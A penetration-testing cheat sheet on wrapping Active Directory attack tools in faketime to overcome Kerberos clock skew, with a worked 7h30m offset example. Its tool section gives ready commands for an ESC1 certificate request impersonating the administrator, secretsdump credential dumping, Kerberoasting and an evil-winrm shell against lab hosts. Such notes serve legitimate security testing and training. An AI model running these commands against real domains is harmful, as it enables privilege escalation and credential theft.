faketime.md (8516B)
1 --- 2 title: "faketime" 3 description: "sudo apt install faketime # ships as libfaketime" 4 category: active-directory 5 subcategory: "Tooling & Recon" 6 tags: ["active-directory", "kerberos"] 7 tools: ["Nmap", "NetExec", "Impacket", "Certipy", "BloodHound"] 8 difficulty: intermediate 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/faketime-cheatsheet.md" 11 --- 12 # Faketime Cheat Sheet — Beating Kerberos Clock Skew 13 14 > [!info] The problem 15 > Kerberos rejects requests whose timestamp differs from the DC by more than the allowed skew window (default **5 minutes**). You see: 16 > ``` 17 > Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) 18 > ``` 19 > Rather than change your host clock (which breaks other things), wrap the *one* tool that needs it with `faketime`. 20 21 ```bash 22 sudo apt install faketime # ships as libfaketime 23 ``` 24 25 `faketime` intercepts time calls (`gettimeofday`, `clock_gettime`) via `LD_PRELOAD` for the wrapped process only. Your system clock stays untouched. 26 27 --- 28 29 ## Table of Contents 30 31 1. [Measuring the Skew](#1-measuring-the-skew) 32 2. [Faketime Offset Syntax](#2-faketime-offset-syntax) 33 3. [The 7h30m Worked Example](#3-the-7h30m-worked-example) 34 4. [Wrapping the Tools](#4-wrapping-the-tools) 35 5. [Absolute-Time Method (ntpdate)](#5-absolute-time-method-ntpdate) 36 6. [Questions & Answers](#6-questions--answers) 37 7. [Gotchas](#7-gotchas) 38 39 --- 40 41 ## 1. Measuring the Skew 42 43 <figure class="flow plate corners"> 44 <figcaption class="flow__cap"><span class="flow__kind">Clock-skew check</span><span class="flow__dir">LR</span></figcaption> 45 <div class="flow__body"> 46 <div class="flow__diagram" data-dir="lr"> 47 <div class="flow-rank"><div class="flow-node is-entry">nmap clock-skew<span class="sub">or ntpdate -q</span></div></div> 48 <div class="flow-edge"></div> 49 <div class="flow-rank"><div class="flow-node is-decision">Skew > 5 min?</div></div> 50 <div class="flow-branches"> 51 <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">No</span></div><div class="flow-node">Run tool normally</div></div> 52 <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">Yes</span></div><div class="flow-node">faketime wrapper</div><div class="flow-edge"></div><div class="flow-node is-goal">Kerberos auth succeeds</div></div> 53 </div> 54 </div> 55 </div> 56 </figure> 57 58 **nmap** reports skew directly on many AD services: 59 60 ```bash 61 nmap -p 445,88 --script smb2-time,clock-skew -Pn dc01.corp.local 62 # ... | clock-skew: mean: 7h30m00s, deviation: 0s, median: 7h30m00s 63 ``` 64 65 Or query the DC's time straight (needs `ntpdate` / `ntpsec-ntpdate`): 66 67 ```bash 68 ntpdate -q dc01.corp.local # prints offset in seconds, e.g. "offset 27000.0..." 69 sudo ntpdate -u dc01.corp.local # actually sync (alternative to faketime) 70 rdate -n dc01.corp.local # another quick reader 71 ``` 72 73 > [!tip] Sign matters 74 > nmap's clock-skew is **DC minus you**. `7h30m` positive = the DC is *ahead* of you, so you must push your faked clock **forward** (`+7h30m`). If the DC is *behind*, go backward (`-7h30m`). 75 76 --- 77 78 ## 2. Faketime Offset Syntax 79 80 `faketime` takes a timestamp specifier as its first argument, then the command: 81 82 ```bash 83 faketime '<time-spec>' <command> [args...] 84 ``` 85 86 Relative offsets use a leading `+` or `-` and unit suffixes: 87 88 | Unit | Meaning | 89 | :-- | :-- | 90 | `s` | seconds | 91 | `m` | minutes | 92 | `h` | hours | 93 | `d` | days | 94 | `y` | years | 95 96 ```bash 97 faketime '+7h30m' <cmd> # 7 hours 30 minutes into the future 98 faketime '-7h30m' <cmd> # 7 hours 30 minutes into the past 99 faketime '+27000s' <cmd> # same as +7h30m, in raw seconds 100 faketime '-1h' <cmd> # one hour back 101 ``` 102 103 > [!note] `-f` for programs that fork/exec 104 > Many pentest tools spawn children or advance their own clock. Add `-f` (follow) so the faked time propagates to child processes: 105 > ```bash 106 > faketime -f '+7h30m' certipy-ad find ... 107 > ``` 108 > Use `-f` by default when wrapping Python/impacket tooling. 109 110 --- 111 112 ## 3. The 7h30m Worked Example 113 114 Scenario: `nmap` shows `clock-skew: median: 7h30m00s` and the DC is **ahead**. 115 116 ```bash 117 # 1. Confirm direction and magnitude 118 nmap -p 445 --script smb2-time,clock-skew -Pn 10.10.10.5 119 120 # 2. Everything Kerberos-related now gets the wrapper: 121 faketime -f '+7h30m' <your-kerberos-tool> 122 123 # If the DC were 7h30m BEHIND you instead: 124 faketime -f '-7h30m' <your-kerberos-tool> 125 ``` 126 127 That single prefix is all that changes — the tool itself is invoked exactly as normal after it. 128 129 --- 130 131 ## 4. Wrapping the Tools 132 133 > [!warning] Wrap the process that talks Kerberos 134 > Prefix `faketime -f '<offset>'` directly onto the command. Do **not** pipe or subshell it away. 135 136 ### Certipy (AD CS / ESC attacks) 137 138 ```bash 139 # Enumerate templates over Kerberos with skew correction 140 faketime -f '+7h30m' certipy-ad find -u 'user@corp.local' -p 'Passw0rd!' \ 141 -dc-ip 10.10.10.5 -k -no-pass -vulnerable -stdout 142 143 # Request a cert (ESC1) with a fake time 144 faketime -f '+7h30m' certipy-ad req -u 'user@corp.local' -p 'Passw0rd!' \ 145 -ca 'CORP-CA' -template 'VulnTemplate' -upn 'administrator@corp.local' \ 146 -dc-ip 10.10.10.5 147 148 # Authenticate with the resulting PFX (PKINIT) — also needs correct time 149 faketime -f '+7h30m' certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.10.5 150 ``` 151 152 ### bloodhound-ce-python (collection over Kerberos) 153 154 ```bash 155 # Collect using a Kerberos ticket (ccache) with skew correction 156 faketime -f '+7h30m' bloodhound-ce-python -d corp.local -u user -k -no-pass \ 157 -dc dc01.corp.local -ns 10.10.10.5 -c All --zip 158 ``` 159 160 See bloodhound-ce-python-cheatsheet for the full flag set. 161 162 ### Impacket (secretsdump, GetUserSPNs, psexec, wmiexec) 163 164 ```bash 165 export KRB5CCNAME=user.ccache 166 faketime -f '+7h30m' impacket-GetUserSPNs -k -no-pass -dc-host dc01.corp.local corp.local/user 167 faketime -f '+7h30m' impacket-secretsdump -k -no-pass corp.local/user@dc01.corp.local 168 faketime -f '+7h30m' impacket-getTGT corp.local/user:'Passw0rd!' -dc-ip 10.10.10.5 169 ``` 170 171 ### netexec / evil-winrm 172 173 ```bash 174 faketime -f '+7h30m' netexec smb dc01.corp.local -u user -p 'Passw0rd!' -k 175 faketime -f '+7h30m' evil-winrm -i dc01.corp.local -u administrator -r corp.local 176 ``` 177 178 --- 179 180 ## 5. Absolute-Time Method (ntpdate) 181 182 Instead of computing an offset, pin faketime to the DC's *actual* clock. This auto-corrects magnitude **and** direction: 183 184 ```bash 185 # Grab the DC's current time and hand it straight to faketime 186 faketime -f "$(sudo ntpdate -q dc01.corp.local | head -n1 | awk '{print $1, $2}')" \ 187 certipy-ad find -u 'user@corp.local' -p 'Passw0rd!' -dc-ip 10.10.10.5 -k 188 ``` 189 190 > [!tip] When to use which 191 > **Relative (`+7h30m`)** is fastest when nmap already gave you the skew. **Absolute (ntpdate)** is safer when you're unsure of the direction or the skew is odd (leap seconds, wrong timezone on your box). 192 193 --- 194 195 ## 6. Questions & Answers 196 197 ### Q: nmap says `clock-skew: median: 7h30m00s`. What faketime prefix do I use? 198 **Approach:** nmap reports DC-minus-you; a positive value means the DC is ahead. 199 ```bash 200 faketime -f '+7h30m' <tool> 201 ``` 202 **Answer:** `+7h30m` (if the DC is ahead). Use `-7h30m` if it's behind. 203 204 ### Q: I keep getting `KRB_AP_ERR_SKEW` even with faketime. Why? 205 **Answer:** Likely missing `-f`, wrong sign, or your host timezone is off. Confirm with `sudo ntpdate -q <dc>` and prefer the absolute-time method (§5). 206 207 ### Q: Does faketime change my real system clock? 208 **Answer:** No. It only alters what the wrapped process sees via `LD_PRELOAD`. Everything else stays on real time. 209 210 ### Q: Can I just run `ntpdate` to sync instead? 211 **Answer:** Yes — `sudo ntpdate -u dc01.corp.local` syncs your whole host. It's simpler but affects every process and needs root; faketime is surgical and rootless. 212 213 --- 214 215 ## 7. Gotchas 216 217 > [!warning] Common pitfalls 218 > - **Forgot `-f`** — child/fork'd processes (most Python tools) don't inherit the fake clock without it. 219 > - **Wrong sign** — pushing the clock the wrong way doubles the skew instead of cancelling it. 220 > - **Timezone drift** — if your host TZ is wrong, the seconds offset can look bizarre; use absolute time. 221 > - **Statically linked binaries** — faketime relies on `LD_PRELOAD`, so it can't hook fully static binaries (rare for pentest tooling). 222 > - **Wrapping a shell, not the tool** — `faketime -f '+7h30m' bash -c '...'` works, but prefix the actual tool where possible. 223 224 --- 225 226 ## See Also 227 228 - bloodhound-ce-python-cheatsheet — CE collector, all with faketime notes 229 - BloodHound-Python_Cheatsheet — legacy BloodHound python collector 230 - Kerberos — tickets, roasting, PKINIT